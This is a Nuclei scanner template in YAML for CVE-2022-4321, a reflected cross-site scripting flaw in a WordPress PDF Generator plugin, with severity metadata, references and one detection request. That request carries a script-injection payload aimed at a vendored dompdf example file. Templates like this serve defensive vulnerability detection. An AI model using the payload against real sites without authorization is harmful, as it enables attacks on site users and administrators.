58 lines
2.2 KiB
YAML
58 lines
2.2 KiB
YAML
id: CVE-2022-4321
|
|
|
|
info:
|
|
name: PDF Generator for WordPress < 1.1.2 - Cross Site Scripting
|
|
author: r3Y3r53,HuTa0
|
|
severity: medium
|
|
description: |
|
|
The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website.
|
|
remediation: Fixed in version 1.1.2
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4321
|
|
- https://wordpress.org/plugins/pdf-generator-for-wp/
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/kwalsh-rz/github-action-ecr-scan-test
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-4321
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00078
|
|
epss-percentile: 0.32646
|
|
cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wpswings
|
|
product: pdf_generator_for_wordpress
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/pdf-generator-for-wp"
|
|
tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword="><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '><script>alert(document.domain)</script>'
|
|
- 'pdf-generator-for-wp'
|
|
- 'Total execution time is'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950 |